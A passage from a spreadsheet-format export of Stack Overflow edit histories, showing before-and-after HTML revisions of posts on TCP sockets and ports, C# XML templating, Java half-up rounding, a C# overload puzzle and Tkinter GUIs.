 &lt;p&gt; The purpose of ports is to differentiate multiple endpoints on a given network address. You could say that a port is a virtualised endpoint. This virtualisation makes multiple concurrent connections on a single network interface possible.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; It is the socket pair (the 4-tuple consisting of the client IP address, client port number, server IP address, and server port number) that specifies the two endpoints that uniquely identifies each TCP connection in an internet. (&lt;em&gt;TCP-IP Illustrated Volume 1&lt;/em&gt;, W. Richard Stevens)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; In most C-derived lanaguages, TCP connections are established and manipulated using methods on an instance of a Socket class. Although it is common to operate on a higher level of abstraction, typically an instance of a NetworkStream class, this generally exposes a reference to a socket object. To the coder this socket object appears to represent the connection because the connection is created and manipulated using methods of the socket object.&lt;/p&gt; _x000D_
 &lt;p&gt; In C#, to establish a TCP connection (to an existing listener) first you create a &lt;em&gt;TcpClient&lt;/em&gt;. If you don't specify an endpoint to the &lt;em&gt;TcpClient&lt;/em&gt; constructor it uses defaults - one way or another the local endpoint is defined. Then you invoke the &lt;em&gt;Connect&lt;/em&gt; method on the instance you've created. This method requires a parameter describing the other endpoint.&lt;/p&gt; _x000D_
 &lt;p&gt; All this is a bit confusing and leads you to believe that a socket is a connection, which is bollocks. I was labouring under this misapprehension until Richard Dorman asked the question.&lt;/p&gt; _x000D_
 &lt;p&gt; Having done a lot of reading and thinking, I'm now convinced that it would make a lot more sense to have a class &lt;em&gt;TcpConnection&lt;/em&gt; with a constructor that takes two arguments, &lt;em&gt;LocalEndpoint&lt;/em&gt; and &lt;em&gt;RemoteEndpoint&lt;/em&gt;. You could probably support a single argument &lt;em&gt;RemoteEndpoint&lt;/em&gt; when defaults are acceptable for the local endpoint. This is ambiguous on multihomed computers, but the ambiguity can be resolved using the routing table by selecting the interface with the shortest route to the remote endpoint.&lt;/p&gt; _x000D_
 &lt;p&gt; Clarity would be enhanced in other respects, too. A socket is &lt;em&gt;not&lt;/em&gt; identified by the combination of IP address and port:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; [...]TCP demultiplexes incoming segments using all four values that comprise the local and foreign addresses: destination IP address, destination port number, source IP address, and source port number. TCP cannot determine which process gets an incoming segment by looking at the destination port only. Also, the only one of the [various] endpoints at [a given port number] that will receive incoming connection requests is the one in the listen state. (p255, &lt;em&gt;TCP-IP Illustrated Volume 1&lt;/em&gt;, W. Richard Stevens)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; As you can see, it is not just possible but quite likely for a network service to have numerous sockets with the same address/port, but only one listener socket on a particular address/port combination. Use of a socket object as a proxy for a TCP connection is thus &lt;em&gt;very&lt;/em&gt; misleading.&lt;/p&gt; _x000D_
 &lt;h2&gt;References&lt;/h2&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;em&gt;TCP-IP Illustrated Volume 1 The Protocols&lt;/em&gt;, W. Richard Stevens, 1994 Addison Wesley&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;em&gt;&lt;a href="http://tools.ietf.org/html/rfc793" rel="nofollow noreferrer"&gt;RFC793&lt;/a&gt;&lt;/em&gt;, Information Sciences Institute, University of Southern California for DARPA&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Summary&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A TCP socket is an endpoint &lt;em&gt;instance&lt;/em&gt;&lt;/strong&gt; defined by an IP address and a port in the context of either a particular TCP connection or the listening state.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A port is a virtualisation identifier&lt;/strong&gt; defining a service endpoint (as distinct from a service &lt;em&gt;instance&lt;/em&gt; endpoint aka session identifier).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A TCP socket is &lt;em&gt;not&lt;/em&gt; a connection&lt;/strong&gt;, it is the endpoint of a specific connection.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;There can be concurrent connections to a service endpoint&lt;/strong&gt;, because a connection is identified by &lt;em&gt;both its local and remote&lt;/em&gt; endpoints, allowing traffic to be routed to a specific service instance.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;There can only be one listener socket for a given address/port combination&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;h2&gt;Exposition&lt;/h2&gt; _x000D_
 &lt;p&gt; This was an interesting question that forced me to re-examine a number of things I thought I knew inside out. You'd think a name like "socket" would be self-explanatory: it was obviously chosen to evoke imagery of the endpoint into which you plug a network cable, there being strong functional parallels. Nevertheless, in network parlance the word "socket" carries so much baggage that a careful re-examination is necessary.&lt;/p&gt; _x000D_
 &lt;p&gt; In the broadest possible sense, a port is a point of ingress or egress.&lt;span class="diff-add"&gt; The French word &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;porte&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; literally means &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;door&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt; Ports, then, are transportation endpoints whether you ship data or big steel containers.&lt;/p&gt; _x000D_
 &lt;p&gt; For the purpose of this discussion I will limit consideration to the context of TCP-IP networks. The OSI model is all very well but has never been completely implemented, much less widely deployed in high-traffic high-stress conditions.&lt;/p&gt; _x000D_
 &lt;p&gt; The combination of an IP address and a port is strictly known as an endpoint and is sometimes called a socket. This usage originates with RFC793, the original TCP specification.&lt;/p&gt; _x000D_
 &lt;p&gt; A TCP &lt;em&gt;connection&lt;/em&gt; is defined by two endpoints aka &lt;em&gt;sockets&lt;/em&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; An endpoint (socket) is defined by the combination of a network address and a &lt;em&gt;port&lt;/em&gt; identifier. Note that address/port does &lt;em&gt;not&lt;/em&gt; completely identify a socket (more on this later).&lt;/p&gt; _x000D_
 &lt;p&gt; The purpose of ports is to differentiate multiple endpoints on a given network address. You could say that a port is a virtualised endpoint. This virtualisation makes multiple concurrent connections on a single network interface possible.&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; It is the socket pair (the 4-tuple consisting of the client IP address, client port number, server IP address, and server port number) that specifies the two endpoints that uniquely identifies each TCP connection in an internet. (&lt;em&gt;TCP-IP Illustrated Volume 1&lt;/em&gt;, W. Richard Stevens)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; In most C-derived lanaguages, TCP connections are established and manipulated using methods on an instance of a Socket class. Although it is common to operate on a higher level of abstraction, typically an instance of a NetworkStream class, this generally exposes a reference to a socket object. To the coder this socket object appears to represent the connection because the connection is created and manipulated using methods of the socket object.&lt;/p&gt; _x000D_
 &lt;p&gt; In C#, to establish a TCP connection (to an existing listener) first you create a &lt;em&gt;TcpClient&lt;/em&gt;. If you don't specify an endpoint to the &lt;em&gt;TcpClient&lt;/em&gt; constructor it uses defaults - one way or another the local endpoint is defined. Then you invoke the &lt;em&gt;Connect&lt;/em&gt; method on the instance you've created. This method requires a parameter describing the other endpoint.&lt;/p&gt; _x000D_
 &lt;p&gt; All this is a bit confusing and leads you to believe that a socket is a connection, which is bollocks. I was labouring under this misapprehension until Richard Dorman asked the question.&lt;/p&gt; _x000D_
 &lt;p&gt; Having done a lot of reading and thinking, I'm now convinced that it would make a lot more sense to have a class &lt;em&gt;TcpConnection&lt;/em&gt; with a constructor that takes two arguments, &lt;em&gt;LocalEndpoint&lt;/em&gt; and &lt;em&gt;RemoteEndpoint&lt;/em&gt;. You could probably support a single argument &lt;em&gt;RemoteEndpoint&lt;/em&gt; when defaults are acceptable for the local endpoint. This is ambiguous on multihomed computers, but the ambiguity can be resolved using the routing table by selecting the interface with the shortest route to the remote endpoint.&lt;/p&gt; _x000D_
 &lt;p&gt; Clarity would be enhanced in other respects, too. A socket is &lt;em&gt;not&lt;/em&gt; identified by the combination of IP address and port:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; [...]TCP demultiplexes incoming segments using all four values that comprise the local and foreign addresses: destination IP address, destination port number, source IP address, and source port number. TCP cannot determine which process gets an incoming segment by looking at the destination port only. Also, the only one of the [various] endpoints at [a given port number] that will receive incoming connection requests is the one in the listen state. (p255, &lt;em&gt;TCP-IP Illustrated Volume 1&lt;/em&gt;, W. Richard Stevens)&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; As you can see, it is not just possible but quite likely for a network service to have numerous sockets with the same address/port, but only one listener socket on a particular address/port combination. Use of a socket object as a proxy for a TCP connection is thus &lt;em&gt;very&lt;/em&gt; misleading.&lt;/p&gt; _x000D_
 &lt;h2&gt;References&lt;/h2&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;em&gt;TCP-IP Illustrated Volume 1 The Protocols&lt;/em&gt;, W. Richard Stevens, 1994 Addison Wesley&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;em&gt;&lt;a href="http://tools.ietf.org/html/rfc793" rel="nofollow noreferrer"&gt;RFC793&lt;/a&gt;&lt;/em&gt;, Information Sciences Institute, University of Southern California for DARPA&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Peter Wone</t>
  </si>
  <si>
    <t>Alexandre Bourlier</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to generate an XML file in C#.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to write the code that generates this in a file that is mostly &lt;span class="diff-delete"&gt;XML&lt;/span&gt; with code inside of it &lt;span class="diff-delete"&gt;similar to how templating works&lt;/span&gt; in ASP.NET.&lt;/p&gt; _x000D_
 &lt;p&gt; So I want a code file that looks like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;lots of angle brackets...&amp;gt;_x000D_
_x000D_
  &amp;lt;% foreach(data in myData)_x000D_
     { %&amp;gt;_x000D_
_x000D_
     &amp;lt; &amp;lt;%= data.somefield %&amp;gt;_x000D_
_x000D_
  &amp;lt;% } %&amp;gt;_x000D_
_x000D_
More angle brackets&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would generate my XML file. I would not mind using &lt;span class="diff-delete"&gt;ASP&lt;/span&gt;.&lt;span class="diff-delete"&gt;NET&lt;/span&gt; if someone tells me how I can do it without IIS overhead or kludging a generation of a web file.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I need to generate an XML file in C#.&lt;/p&gt; _x000D_
 &lt;p&gt; I want to write the code that generates this in a file that is mostly &lt;span class="diff-add"&gt;Xml&lt;/span&gt; with code inside of it &lt;span class="diff-add"&gt;as I can&lt;/span&gt; in&lt;span class="diff-add"&gt; an&lt;/span&gt; ASP.NET&lt;span class="diff-add"&gt; MVC page&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; So I want a code file that looks like:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;lots of angle brackets...&amp;gt;_x000D_
_x000D_
  &amp;lt;% foreach(data in myData)_x000D_
     { %&amp;gt;_x000D_
_x000D_
     &amp;lt; &amp;lt;%= data.somefield %&amp;gt;_x000D_
_x000D_
  &amp;lt;% } %&amp;gt;_x000D_
_x000D_
More angle brackets&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would generate my XML file. I would not mind using &lt;span class="diff-add"&gt;part of System&lt;/span&gt;.&lt;span class="diff-add"&gt;Web&lt;/span&gt; if someone tells me how I can do it without IIS overhead or kludging a generation of a web file.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;I want to use templating and I want templating that is similar to ASP.NET&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Peter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What I would like is a method to convert a double to a string which rounds using the half-up method - i.e. if the decimal to be rounded is 5, it always rounds up to the previous number. This is the standard method of rounding most people expect in most situations.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I also would like only significant digits to be displayed - i.e. there should not be any trailing zeroes.&lt;/p&gt; _x000D_
 &lt;p&gt; I know one method of doing this is to use the &lt;code&gt;String.format&lt;/code&gt; method:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String.format("%.5g%n", 0.912385);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91239_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is great, however it always displays numbers with 5 decimal places even if they are not significant:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String.format("%.5g%n", 0.912300);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91230_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Another method is to use the &lt;code&gt;DecimalFormatter&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;DecimalFormat df = new DecimalFormat("#.#####");_x000D_
df.format(0.912385);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91238_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However as you can see this uses half-even rounding. That is it will round down if the previous digit is even. What I'd like is this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.912385 -&amp;gt; 0.91239_x000D_
0.912300 -&amp;gt; 0.9123_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What is the best way to achieve this in Java?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What I would like is a method to convert a double to a string which rounds using the half-up method - i.e. if the decimal to be rounded is 5, it always rounds up to the previous number. This is the standard method of rounding most people expect in most situations.&lt;/p&gt; _x000D_
 &lt;p&gt; I also would like only significant digits to be displayed - i.e. there should not be any trailing zeroes.&lt;/p&gt; _x000D_
 &lt;p&gt; I know one method of doing this is to use the &lt;code&gt;String.format&lt;/code&gt; method:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String.format("%.5g%n", 0.912385);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91239_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; which is great, however it always displays numbers with 5 decimal places even if they are not significant:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;String.format("%.5g%n", 0.912300);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91230_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Another method is to use the &lt;code&gt;DecimalFormatter&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;DecimalFormat df = new DecimalFormat("#.#####");_x000D_
df.format(0.912385);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; returns:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.91238_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; However as you can see this uses half-even rounding. That is it will round down if the previous digit is even. What I'd like is this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;0.912385 -&amp;gt; 0.91239_x000D_
0.912300 -&amp;gt; 0.9123_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; What is the best way to achieve this in Java?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://java.sun.com/javase/6/docs/api/java/text/DecimalFormat.html#setRoundingMode(java.math.RoundingMode)" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;setRoundingMode&lt;/span&gt;&lt;/a&gt;, see linked Javadoc, set the &lt;a href="http://java.sun.com/javase/6/docs/api/java/math/RoundingMode.html" rel="nofollow noreferrer"&gt;rounding mode&lt;/a&gt; explicitly to handle your issue with the half-even round, then use the format pattern for your required output.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Use &lt;a href="http://java.sun.com/javase/6/docs/api/java/text/DecimalFormat.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;setRoundingMode&lt;/span&gt;&lt;/a&gt;, see linked Javadoc, set the &lt;a href="http://java.sun.com/javase/6/docs/api/java/math/RoundingMode.html" rel="nofollow noreferrer"&gt;rounding mode&lt;/a&gt; explicitly to handle your issue with the half-even round, then use the format pattern for your required output.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>OscarRyz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Without running this code, &lt;span class="diff-delete"&gt;identify which &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Foo&lt;/span&gt;&lt;/code&gt; method will be &lt;span class="diff-delete"&gt;called&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;A&lt;/span&gt;_x000D_
{_x000D_
   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; n &lt;/span&gt;)&lt;/span&gt;_x000D_
   {_x000D_
      Console.WriteLine( &lt;span class="hljs-string"&gt;"A::Foo"&lt;/span&gt; );_x000D_
   }_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;B&lt;/span&gt; : &lt;span class="hljs-title"&gt;A&lt;/span&gt;_x000D_
{_x000D_
   &lt;span class="hljs-comment"&gt;/* note that A::Foo and B::Foo are not related at all */&lt;/span&gt;_x000D_
   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;double&lt;/span&gt; n &lt;/span&gt;)&lt;/span&gt;_x000D_
   {_x000D_
      Console.WriteLine( &lt;span class="hljs-string"&gt;"B::Foo"&lt;/span&gt; );_x000D_
   }_x000D_
}_x000D_
_x000D_
&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Main&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt;[] args &lt;/span&gt;)&lt;/span&gt;_x000D_
{_x000D_
   B b = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; B();_x000D_
   &lt;span class="hljs-comment"&gt;/* which Foo is chosen? */&lt;/span&gt;_x000D_
   b.Foo( &lt;span class="hljs-number"&gt;5&lt;/span&gt; );_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Which&lt;/span&gt; method? &lt;span class="diff-delete"&gt;And&lt;/span&gt; why? No cheating by running the code.&lt;/p&gt; _x000D_
 &lt;p&gt; I found this puzzle on the web, and I like it and I think I'm going to use it as an interview question...Opinions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Source:&lt;/span&gt;&lt;/strong&gt; &lt;a href="http://netpl.blogspot.com/2008/06/c-puzzle-no8-beginner.html" rel="nofollow noreferrer"&gt;http://netpl.blogspot.com/2008/06/c-puzzle-no8-beginner.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Without running this code, &lt;span class="diff-add"&gt;what Foo&lt;/span&gt; method will be &lt;span class="diff-add"&gt;ran&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;A&lt;/span&gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;{&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; n &lt;/span&gt;)&lt;/span&gt;&lt;span class="diff-add"&gt; _x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   {&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;      Console.WriteLine( &lt;span class="hljs-string"&gt;"A::Foo"&lt;/span&gt; );&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   }&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;}&lt;span class="diff-add"&gt;_x000D_
_x000D_
 &lt;/span&gt;_x000D_
_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;B&lt;/span&gt; : &lt;span class="hljs-title"&gt;A&lt;/span&gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;{&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   &lt;span class="hljs-comment"&gt;/* note that A::Foo and B::Foo are not related at all */&lt;/span&gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   &lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;public&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Foo&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;double&lt;/span&gt; n &lt;/span&gt;)&lt;/span&gt;&lt;span class="diff-add"&gt; _x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   {&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;    &lt;/span&gt;      Console.WriteLine( &lt;span class="hljs-string"&gt;"B::Foo"&lt;/span&gt; );&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   }&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;}_x000D_
_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;static&lt;/span&gt; &lt;span class="hljs-keyword"&gt;void&lt;/span&gt; &lt;span class="hljs-title"&gt;Main&lt;/span&gt;(&lt;span class="hljs-params"&gt; &lt;span class="hljs-built_in"&gt;string&lt;/span&gt;[] args &lt;/span&gt;)&lt;/span&gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;{&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   B b = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; B();&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   &lt;span class="hljs-comment"&gt;/* which Foo is chosen? */&lt;/span&gt;&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;   &lt;/span&gt;   b.Foo( &lt;span class="hljs-number"&gt;5&lt;/span&gt; );&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;  &lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;What&lt;/span&gt; method? &lt;span class="diff-add"&gt;and&lt;/span&gt; why? No cheating by running the code.&lt;/p&gt; _x000D_
 &lt;p&gt; I found this puzzle on the web, and I like it and I think I'm going to use it as an interview question...Opinions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: Url I found it at:&lt;/span&gt; &lt;a href="http://netpl.blogspot.com/2008/06/c-puzzle-no8-beginner.html" rel="nofollow noreferrer"&gt;http://netpl.blogspot.com/2008/06/c-puzzle-no8-beginner.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>FlySwat</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Python has an embedded GUI toolkit named &lt;a href="http://wiki.python.org/moin/TkInter" rel="nofollow noreferrer"&gt;TKinter&lt;/a&gt; which is based on Tk library from TCL programming language. It is very basic and does not have all the functionality you expect in Windows Forms or GTK for example but if you must have platform independent toolkit I see no other choice taking in mind that you also dont want to grow that much the binary.&lt;/p&gt; _x000D_
 &lt;p&gt; Tkinter is not hard at all to use since it doesnt have millions of widgets/controls and options and is the default toolkit included in most python distributions, at least on Windows, OSX and Linux.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://www.gtk.org/" rel="nofollow noreferrer"&gt;GTK&lt;/a&gt; and &lt;span class="diff-delete"&gt;QT&lt;/span&gt; are prettier and more powerful but they have a one big disadvantage for you: they are heavy and deppend upon third libraries, especially GTK which has a lot of dependencies that makes it a little hard to distribute it embeded in your software.&lt;/p&gt; _x000D_
 &lt;p&gt; As for the binary creation I know there is py2exe which converts python code to win32 executable code (.exe's) but im not sure if there is something similar for OSX. Are you worried because people could see the source code or just so you can bundle all in a single package? If you just want to bundle everything you dont need to create a standalone executable, you could easily create an installer:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://docs.python.org/dist/built-dist.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;http://docs.python.org/dist/built-dist.html&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; That's a guide on how to distribute your software when it's done.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Python has an embedded GUI toolkit named &lt;a href="http://wiki.python.org/moin/TkInter" rel="nofollow noreferrer"&gt;TKinter&lt;/a&gt; which is based on Tk library from TCL programming language. It is very basic and does not have all the functionality you expect in Windows Forms or GTK for example but if you must have platform independent toolkit I see no other choice taking in mind that you also dont want to grow that much the binary.&lt;/p&gt; _x000D_
 &lt;p&gt; Tkinter is not hard at all to use since it doesnt have millions of widgets/controls and options and is the default toolkit included in most python distributions, at least on Windows, OSX and Linux.&lt;/p&gt; _x000D_
